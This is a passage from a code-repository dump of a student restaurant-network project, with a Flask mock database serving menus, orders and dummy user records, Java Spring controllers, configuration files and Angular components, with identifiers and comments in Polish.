= int(rrequest['cena'])\n except KeyError:\n pass\n\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Zmien_status_zamowienia(id_zamowienia:int, status:string)\[email protected]('/zmien_status_zamowienia_Z', methods=['POST'])\ndef zmien_status_zamowienia_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Pobierz zamówienia -> przekopiuj z realizacji\[email protected]('/pobierz_zamowienia_Z', methods=['GET'])\ndef pobierz_zamowienia_Z():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien)\n\n\n# Czy to ma sens? 
: Pobierz_zamowienie(id_zamowienia:int) zwraca (id_klienta:int, id_restauracji:int, lista[id_dania:int,nazwa:string],\n# kwota:double,data_zlozenia:string,status:string,ocena:int)\n\[email protected]('/pobierz_zamowienie_Z', methods=['GET'])\ndef pobierz_zamowienie_Z():\n try:\n if request.args.get(\"id_zamowienia\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(request.args.get(\"id_zamowienia\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien['lista_zamowien'][id_zamowienia])\n\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.64462810754776, "alphanum_fraction": 0.64462810754776, "avg_line_length": 20, "blob_id": "fed472798668ba2466b03a8b73378f52b30089cd", "content_id": "ee5a116990cedc0dd5109d90459398395ec88c4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 484, "license_type": "no_license", "max_line_length": 79, "num_lines": 22, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PaymentAbstract.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage platnosci.Entity;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic abstract class PaymentAbstract {\r\n \r\n final String url;\r\n \r\n public PaymentAbstract(final String url){\r\n this.url = url;\r\n }\r\n \r\n public abstract String pay(final PaymentForm paymentForm);\r\n \r\n}\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 30, "blob_id": "2fea0bdeffb432e53aa71f2ca2653cb36ccf4faf", "content_id": "e3b1c9073103aff8fbcff50a362ea2246e3b29e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Gradle", "length_bytes": 32, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/platnosci/platnosci/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'platnosci'\r\n" }, { "alpha_fraction": 0.5398633480072021, "alphanum_fraction": 0.5489749312400818, "avg_line_length": 25.873016357421875, "blob_id": "2861d69229591e39cbb33243247bec32f2063360", "content_id": "632c362e7d64d1ab7d17e9fa4824e2a5a90e32a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1756, "license_type": "no_license", "max_line_length": 94, "num_lines": 63, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeOfferForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class EmployeeOfferForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeOfferForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String id_restauracji;\r\n private String stanowisko;\r\n private String etat;\r\n private String telefon;\r\n\r\n public String getId_restauracji() {\r\n return id_restauracji;\r\n }\r\n\r\n public String getStanowisko() {\r\n return stanowisko;\r\n }\r\n\r\n public String getEtat() {\r\n return etat;\r\n }\r\n\r\n public String getTelefon() {\r\n return telefon;\r\n }\r\n\r\n public void validate(){\r\n if(!validateTelephone()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateTelephone(){\r\n if(!telefon.matches(\"[\\\\d+ ]+\")){\r\n log.info(\"Telephone number {} has illegal signs\", telefon);\r\n return false; \r\n }\r\n String tmpPhone = telefon;\r\n tmpPhone = tmpPhone.replaceAll(\" \", \"\");\r\n 
if(tmpPhone.codePointAt(0) == '+' && tmpPhone.length() != 12){\r\n log.info(\"Telephone number with plus sign, {}, does not have 9 signs\", telefon);\r\n return false; \r\n }\r\n Integer amountOfNumbers = tmpPhone.replaceAll(\"\\\\D\", \"\").length();\r\n if(amountOfNumbers != 9 && amountOfNumbers != 11 && amountOfNumbers != 13){\r\n log.info(\"Telephone number , {}, has a different size than 9, 11 or 13\", telefon);\r\n return false; \r\n }\r\n return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6012705564498901, "alphanum_fraction": 0.6020179390907288, "avg_line_length": 30.240962982177734, "blob_id": "5c8b33c9d812ff209e74b3010ad635600dc702f4", "content_id": "0f60dbd4b819dedcad68f8ac44e7c8f07ed336b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2676, "license_type": "no_license", "max_line_length": 87, "num_lines": 83, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Controller/NetworkController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_siecia.Controller;\r\n\r\nimport zarzadzanie_siecia.Entity.RestaurantCreator;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\n\r\n@RestController\r\npublic class NetworkController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(NetworkController.class);\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_restauracje\")\r\n public String addRestaurant(\r\n @RequestBody String 
restaurantForm) \r\n {\r\n try{\r\n log.info(\"Adding restaurant {}\", restaurantForm);\r\n return (new RestaurantCreator()).createRestaurant(\r\n restaurantForm, \r\n env.getProperty(\"createRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_restauracje\")\r\n public String getRestaurant() \r\n {\r\n try{\r\n log.info(\"Fetching restaurants\");\r\n return (new RestaurantCreator()).getRestaurant( \r\n env.getProperty(\"getRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @PostMapping(\"/przydziel_menadzera\")\r\n public String assignManager(\r\n @RequestBody String assignManagerForm) \r\n {\r\n try{\r\n log.info(\"Assigning manager {}\", assignManagerForm);\r\n return (new RestaurantCreator()).assignManager(\r\n assignManagerForm,\r\n env.getProperty(\"assignManagerAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/usun_restauracje\")\r\n public String removeRestaurant(\r\n @RequestBody String restaurantIdForm) \r\n {\r\n try{\r\n log.info(\"Removing restaurant {}\", restaurantIdForm);\r\n return (new RestaurantCreator()).removeRestaurant(\r\n restaurantIdForm,\r\n env.getProperty(\"removeRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7176470756530762, "avg_line_length": 32.871795654296875, "blob_id": "c7a752e858bcbd284561db42ca3da88d58e08835", "content_id": "d3a534db54bb51b76f9ed07b4a6aee26122c8365", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1360, "license_type": "no_license", "max_line_length": 97, "num_lines": 39, "path": "/ui-menadzera-restauracji/src/app/app.module.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": 
"import { BrowserModule } from '@angular/platform-browser';\r\nimport { NgModule } from '@angular/core';\r\nimport { FormsModule } from '@angular/forms';\r\nimport { HttpClientModule } from '@angular/common/http';\r\nimport { HttpModule } from '@angular/http';\r\nimport { AppComponent } from './app.component';\r\nimport { RouterModule, Routes } from '@angular/router';\r\n//Service Imports\r\nimport { DataService } from './services/data.service';\r\nimport { AddEmployeeComponent } from './components/add-employee/add-employee.component';\r\nimport { NavbarComponent } from './components/navbar/navbar.component';\r\nimport { AddRecruitmentComponent } from './components/add-recruitment/add-recruitment.component';\r\nimport { HomepageComponent } from './components/homepage/homepage.component';\r\n\r\nconst appRoutes: Routes = [\r\n {path:'', component:HomepageComponent},\r\n {path:'add_employee', component:AddEmployeeComponent},\r\n {path:'add_recruitment', component:AddRecruitmentComponent}\r\n];\r\n\r\n@NgModule({\r\n declarations: [\r\n AppComponent,\r\n AddEmployeeComponent,\r\n NavbarComponent,\r\n AddRecruitmentComponent,\r\n HomepageComponent\r\n ],\r\n imports: [\r\n BrowserModule,\r\n HttpClientModule,\r\n FormsModule,\r\n HttpModule,\r\n RouterModule.forRoot(appRoutes)\r\n ],\r\n providers: [DataService],\r\n bootstrap: [AppComponent]\r\n})\r\nexport class AppModule { }\r\n" }, { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 44, "blob_id": "034bc4348dad001c9de2df1baedd735e721d7fae", "content_id": "3ec6e092b28e0aaff0815040780d9b0f8f9a33d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 46, "license_type": "no_license", "max_line_length": 44, "num_lines": 1, "path": "/baza_zarzadzanie_siecia/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'baza_zarzadzanie_siecia'\r\n" }, { 
"alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 39, "blob_id": "d5e08be13ec3d6ac89b5439df5f45d12994ea80b", "content_id": "97ddfe5f7be9379908cb035568e25d7cf760a13e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 41, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/zarzadzanie_siecia/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'zarzadzanie_siecia'\r\n" }, { "alpha_fraction": 0.6059225797653198, "alphanum_fraction": 0.6116173267364502, "avg_line_length": 20.512821197509766, "blob_id": "f0d8b9b832f5a74c93087ec21f6d9a316f3d7690", "content_id": "b3faae7b1df88cf8be1c2bb84e67c01d70f5a9c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 880, "license_type": "no_license", "max_line_length": 54, "num_lines": 39, "path": "/payment/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { Payment } from './models/payment';\r\nimport { DataService } from './services/data.service';\r\nimport { Observable } from 'rxjs';\r\nimport { interval } from 'rxjs';\r\nimport { } from 'rxjs';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment';\r\n payment: Payment = new Payment();\r\n paymentOptions: any = [\r\n 'BLIK',\r\n 'CARD',\r\n 'PRZELEW'\r\n ];\r\n status: string;\r\n\r\n constructor(public dataService: DataService) { }\r\n\r\n ngOnInit() { \r\n interval(10000)\r\n .subscribe(res => {\r\n this.dataService.getStatus();\r\n });\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.pay(this.payment);\r\n }\r\n\r\n radioChangeHandler(event: any) {\r\n this.payment.sposób_zapłaty = 
event.target.value;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7761732935905457, "alphanum_fraction": 0.8483754396438599, "avg_line_length": 44.16666793823242, "blob_id": "6ca756100181a23a761dfd43eebb1de8458b158c", "content_id": "2b0511ae7dc70b9477f5b5c05928fb6acdd3aa4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 277, "license_type": "no_license", "max_line_length": 63, "num_lines": 6, "path": "/zarzadzanie_siecia/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9094\r\n\r\ncreateRestaurantAddress=http://localhost:9095/dodaj_restauracje\r\ngetRestaurantAddress=http://localhost:9095/pobierz_restauracje\r\nassignManagerAddress=http://localhost:9095/przydziel_menadzera\r\nremoveRestaurantAddress=http://localhost:9095/usun_restauracje\r\n" }, { "alpha_fraction": 0.7469879388809204, "alphanum_fraction": 0.8433734774589539, "avg_line_length": 26.33333396911621, "blob_id": "15696942120bf9d861ae382cd4ee72bb05a20b9a", "content_id": "c0ae2b096ac97398d94f48a87fc05f3b7dba221b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 83, "license_type": "no_license", "max_line_length": 63, "num_lines": 3, "path": "/baza_zarzadzanie_siecia/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9095\r\n\r\ncreateRestaurantAddress=http://localhost:5000/dodaj_restauracje" }, { "alpha_fraction": 0.49597790837287903, "alphanum_fraction": 0.5133603811264038, "avg_line_length": 28.56773567199707, "blob_id": "c0e7b055011452c8d8abfae71aea44b4489c30f0", "content_id": "74da9f6d4b2dcd8f0431407ebd0a2a0a32800485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28608, "license_type": "no_license", "max_line_length": 143, "num_lines": 967, "path": 
"/zaslepki_baz_danych/ZASLEPKA.py", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef main_site():\n return 404\n\n\n# Pobierz_pracownika(id_pracownika: string) zwraca string:login, string:hasło oraz string:stanowisko\[email protected]('/pobierz_pracownika', methods=['GET'])\ndef pobierz_pracownika():\n try:\n if request.args.get(\"id_pracownika\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_pracownika = str(request.args.get(\"id_pracownika\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n employee_list = {\n 'lista': [\n {\n 'login': 'jusepe',\n 'hasło': 'wodjfoph35vg',\n 'stanowisko': 'Pracownik kuchni'\n\n },\n {\n 'login': 'jadeSzybko12',\n 'hasło': 'epivrugoi',\n 'stanowisko': 'Dostawca'\n },\n {\n 'login': 'hania_87',\n 'hasło': 'wr98cyeui',\n 'stanowisko': 'Sprzątaczka'\n }\n ]\n }\n for pracownik in employee_list['lista']:\n if pracownik['login'] == id_pracownika:\n return jsonify(pracownik)\n\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# Pobierz_klienta(id_klienta:string) zwraca string:login, string:hasło\[email protected]('/pobierz_klienta', methods=['GET'])\ndef pobierz_klienta():\n try:\n if request.args.get(\"id_klienta\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = str(request.args.get(\"id_klienta\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n client_list = {\n 'lista': [\n {\n 'login': 'hydroMen',\n 'hasło': 'sdhvgo'\n\n },\n {\n 'login': 'Grunwald44',\n 'hasło': 'spwwocihpf'\n },\n {\n 'login': 'rysio99',\n 'hasło': 'tesy54pipoyr'\n }\n ]\n }\n for klient in client_list['lista']:\n if klient['login'] == id_klienta:\n return jsonify(klient)\n\n resp = jsonify(success=False)\n 
resp.status_code = 404\n return resp\n\n\nnetwork_menu = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n }\n ]\n}\n\nrestaurant_menu_1 = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n },\n {\n 'id_dania': 3,\n 'nazwa': 'Bułka',\n 'cena': 2.99,\n 'opis': 'Duża buła'\n }\n ]\n}\n\nrestaurant_menu_2 = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n },\n {\n 'id_dania': 4,\n 'nazwa': 'Chleb',\n 'cena': 0.99,\n 'opis': 'Dobry chlebek'\n }\n ]\n}\n\nid_dania_iterator = 4\n\n\[email protected]('/pobierz_menu_restauracji', methods=['GET'])\ndef pobierz_menu_restauracji():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n if id_restauracji == 0:\n return jsonify(network_menu)\n elif id_restauracji == 1:\n return jsonify(restaurant_menu_1)\n elif id_restauracji == 2:\n return jsonify(restaurant_menu_2)\n else:\n resp = jsonify('nie ma takiej restuaracji')\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# Pobierz_restauracje(miasto:string) zwraca (lista[id_restauracji:int, nazwa:string, adres:string])\[email protected]('/pobierz_restauracje_z_miasta', methods=['GET'])\ndef pobierz_resturacje_z_miasta():\n restaurant_list = {\n 'lista': [\n {\n 'id_restauracji': 1,\n 'nazwa': 'Don Keke',\n 'adres': 'Liliowa 12'\n\n },\n {\n 'id_restauracji': 2,\n 'nazwa': 'Bambino',\n 'adres': 'Arnolda 4'\n },\n {\n 'id_restauracji': 3,\n 'nazwa': 
'Que pasa',\n 'adres': 'Grunwaldzka 13'\n }\n ]\n }\n try:\n if request.args.get(\"miasto\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n miasto = str(request.args.get(\"miasto\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(restaurant_list)\n\n\n# Pobierz_miasta() zwraca (lista[miasto:string])\[email protected]('/pobierz_miasta', methods=['GET'])\ndef pobierz_miasta():\n cities_list = {\n 'lista': [\n {\n 'nazwa': 'Warszawa'\n },\n {\n 'nazwa': 'Radom'\n },\n {\n 'nazwa': 'Torun'\n }\n ]\n }\n return jsonify(cities_list)\n\n\n# Dodaj_danie(id_restauracji:int, nazwa:string,cena:double,opis:string)\[email protected]('/dodaj_danie', methods=['POST'])\ndef dodaj_danie():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_restauracji\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = rrequest[\"id_restauracji\"]\n if rrequest[\"nazwa\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwa = rrequest[\"nazwa\"]\n if rrequest[\"opis\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n opis = rrequest[\"opis\"]\n if rrequest[\"cena\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n cena = rrequest[\"cena\"]\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n global id_dania_iterator\n id_dania_iterator += 1\n if id_restauracji == 1:\n restaurant_menu_1['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 'cena': cena,\n 'opis': opis\n\n })\n print(restaurant_menu_1)\n elif id_restauracji == 2:\n restaurant_menu_2['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 'cena': cena,\n 'opis': opis\n\n })\n print(restaurant_menu_2)\n elif id_restauracji == 0:\n network_menu['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 
'cena': cena,\n 'opis': opis\n\n })\n print(network_menu)\n else:\n resp = jsonify('nie ma takiej restuaracji')\n resp.status_code = 404\n return resp\n\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Usun_danie(id_dania:int, id_restauracji:int) <- usuwa danie z oferty sieci lub restauracji\[email protected]('/usun_danie', methods=['GET'])\ndef usun_danie():\n try:\n if request.args.get(\"id_dania\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_dania = int(request.args.get(\"id_dania\"))\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n\n k = 0\n if id_restauracji == 0:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n network_menu['lista'].pop(k)\n k += 1\n k = 0\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_1['lista'].pop(k)\n k += 1\n k = 0\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_2['lista'].pop(k)\n k += 1\n elif id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_1['lista'].pop(k)\n k += 1\n else:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_2['lista'].pop(k)\n k += 1\n print(network_menu)\n print(restaurant_menu_1)\n print(restaurant_menu_2)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Modyfikuj_danie(id_dania:int, id_restauracji:int, nazwa:string, cena:double, opis:string)\[email protected]('/modyfikuj_danie', methods=['POST'])\ndef modyfikuj_danie():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_restauracji\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n 
return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n if id_restauracji != 1 and id_restauracji != 2:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n try:\n if rrequest[\"id_dania\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_dania = int(rrequest['id_dania'])\n try:\n if rrequest[\"nazwa\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"cena\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"opis\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n except KeyError:\n pass\n\n print(network_menu)\n print(restaurant_menu_1)\n 
print(restaurant_menu_2)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\nlista_zamowien_R = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_restauracji': 1,\n 'kwota': 23.99,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'oczekujace',\n 'kontakt': {'imie': 'Jan', 'nazwisko': 'Kowalski', 'telefon': '123456789', 'adres': 'Konwaliowa 3'}\n },\n {\n 'id_zamowienia': 2,\n 'id_restauracji': 2,\n 'kwota': 25.77,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'przygotowywane',\n 'kontakt': {'imie': 'Adam', 'nazwisko': 'Wypadam', 'telefon': '123456789', 'adres': 'Wysoka 3'}\n\n },\n {\n 'id_zamowienia': 3,\n 'id_restauracji': 3,\n 'kwota': 30.57,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'w_drodze',\n 'kontakt': {'imie': 'Andrzej', 'nazwisko': 'Adrianowski', 'telefon': '123456789', 'adres': 'Cicha 3'}\n }\n ]\n}\n\n\[email protected]('/zmien_status_zamowienia', methods=['POST'])\ndef zmien_status_zamowienia():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien_R['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\[email protected]('/pobierz_zamowienia', methods=['GET'])\ndef pobierz_zamowienia():\n try:\n if 
request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien_R)\n\n\nlista_zamowien = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_klienta': 1,\n 'id_restauracji': 1,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 26.88,\n 'status': 'oczekujace',\n 'data_zlozenia': '2018-09-10',\n 'ocena': '2/10',\n 'adres': \"Grunwaldzka 13\"\n },\n {\n 'id_zamowienia': 2,\n 'id_klienta': 2,\n 'id_restauracji': 3,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 59.88,\n 'status': 'przygotowywane',\n 'data_zlozenia': '2018-06-11',\n 'ocena': '4/10',\n 'adres': \"Wolności 15\"\n\n },\n {\n 'id_zamowienia': 3,\n 'id_klienta': 1,\n 'id_restauracji': 5,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 43.80,\n 'status': 'w_drodze',\n 'data_zlozenia': '2018-12-16',\n 'ocena': '8/10',\n 'adres': \"Alternatywy 4\"\n\n }\n ]\n}\nzamowienia_interator = 4\n\n\[email protected]('/dodaj_zamowienie_Z', methods=['POST'])\ndef dodaj_zamowienie_Z():\n try:\n rrequest = request.get_json()\n if rrequest['id_klienta'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = int(rrequest['id_klienta'])\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['lista_dan'] 